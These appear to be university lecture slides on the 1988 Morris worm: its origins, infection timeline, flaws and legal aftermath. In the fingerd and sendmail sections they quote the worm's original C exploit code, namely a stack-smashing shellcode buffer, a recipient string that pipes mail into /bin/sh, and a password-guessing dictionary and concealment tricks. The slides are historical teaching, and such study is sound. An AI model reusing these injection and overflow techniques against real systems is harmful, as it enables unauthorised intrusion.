The Internet Worm of 1988

Svetlana V. Drachova-StrangClemson University

CPSC 681April 25, 2006

“ There may be a virus loose on the internet “Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988

Creator and His Creation

November 2nd, 1988: Robert Tappan Morris, 23-year old cs student from Cornell released a worm from MIT.

Aside: son of Robert Morris, Sr. Chief Scientist at the National Computer Security Center, subdivision of NSA

The Morris worm: Consisted of several files of cleverly-written C code

Intentions: Probe the size of Internet with a self-replicating program ?

Effects: -- Internet down -- Thousands of machines disconnected from Internet -- Worm on the loose

What the worm DID NOT do:

Did not cause physical damage to computer systems.

Did not alter or destroy system or user files

Did not affect machines running OSs other than VAX or BSD Unix

Did not save or transmit the cracked passwords

Did not attempt to gain superuser access

Did not plant any trojans or timebombs

Did not attack machines that were not attached to the internet

What the worm DID:

Self-propagated through Internet infecting and reinfecting machines

Self-replicated unstoppably

Explored several vulnerabilities: fingerd, sendmail, passwords

Had flaws that made it especially destructive, and/or impaired the intended functionality

Cracked user passwords

Disguised itself by several clever means

History and Origins

“Worms were good at first”: Noble usage

1975: “tapeworm” John Brunner’s The Shockwave Rider

early 1980s: John Shoch, Jon Hupp created five worms for executing helpful tasks on the internet: billboard worm, vampire worm, etc.: “ a useful way to run distributed diagnostics”

Mishap and the first lesson learned

Conclusions

We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machineto machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored… (J. Shoch, J. Hupp)

The Horrible Night

6:00 PM The Worm is launched

8:49 PM The Worm infects a VAX-8600 at the University of Utah

9:09 PM The Worm initiates the first attack to infect others

9:21 PM Load average on the system reaches 5 (sh be 1)

9:41 PM Load average reaches 7

10:01 PM Load average reaches 16

10:06 PM No new processes can be started. System unusable

10:20 PM System administrator kills off the worms

10:41 PM System is reinfected, load average reaches 27 10:49 PM System administrator shuts down and restarts the system

11:21 PM Reinfestation causes load average to reach 37.

fingerd Vulnerability Exploited

fingerd has a 512 char buffer

worm calls write() with 536 char + newline argument 6 words overwrite system stack including return PC, that makes a system call version of execve(“/bin/sh”) that installs the worm on the target system.

char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003 \320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351";

/* Rewrite part of the stack frame */ l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; l568 = 0x28000000; l552 = 0x0001c020;

#ifdef sun /* Reverse the word order for the Sun machines*/ l556 = byte_swap(l556); l560 = byte_swap(l560); l564 = byte_swap(l564); l568 = byte_swap(l568); l552 = byte_swap(l552);#endif sun

write(s, buf, sizeof(buf)); /* sizeof == 536 */ write(s, XS("\n"), 1); sleep(5); if (test_connection(s, s, 10)) {

*fd1 = s; *fd2 = s;return 1; }

sendmail Vulnerability Exploited

TCP flaw - DEBUG flag allows to send mail to a process instead of user.

Worm sends message with DEBUG flad to a cleverly built recepient,

String sets up command deleting header, passes body to command interpreter. It will compile code that opens a connection and gets a copy of the worm

#define MAIL_FROM "mail from:</dev/null>\n"#define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n"

send_text(s, XS(MAIL_FROM)); sprintf(l548, XS(MAIL_RCPT), i, i);send_text(s, l548); send_text(s, XS("data\n")); compile_slave(host, s, saddr); send_text(s, XS("\n.\n")); send_text(s, XS("quit\n"));

Password Cracking

Exploited 2 vulnerabilities:

System: /etc/passwd file

User: weak passwords

Attack has 4 stages:

0: seek other machines to infect from /etc/hosts.equiv and /.rhosts

1: obvious password guesses (35% success)

2: worm’s internal dictionary

3: system’s online dictionary in /usr/dict/words

Worm’s dictionary

char *wds[ ] = /* 0x21a74 */

{"academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander", "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals", "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur", "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas", "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater", "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl", "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess", "campanile", "cantor", "cardinal",

. . . "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato", "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle", "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo", "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting", "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard", "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman", 0

};

/* contained 421 words*/

Concealing Itself

Rename itself to sh, which is also the name of the Bourne shell

strcpy(argv[0], XS("sh"));

Set core dump size to zero:

rl.rlim_cur = 0;rl.rlim_max = 0;if (setrlimit(RLIMIT_CORE, &rl)) ;

Deleting parent process and manipulating process id

Used encryption

Oops, … The Worm Had Flaws

Major flaws in the program code:

only ≈14% chance that the worm will check if the target system has already been infected

1 in 7 chance (instead of 1 in 10,000) that listening worm will not listen for a pleasequit() signal

Used TCP socket command sendto instead of the UDP send to send 1B of data from each machine to the originating Berkely machine 128.32.137.13 port 11357 There were other flaws as well

Worm Map

[from http://snowplow.org/tom/worm/history.html]

Complex Logic of the Worm

Lessons Learned

The Morris Worm was the first worm to bring Internet down

Worm is a powerful tool capable of inflicting a lot of damage

Computer crime is punishable under the Computer Fraud and Abuse Act of 1986.

Later Mr. Morris himself stated that the incident “has raised the public awareness to a considerable degree”. [R H Morris, quoted in the New York Times 11/5/88].

System administrators increased their efforts in protecting their systems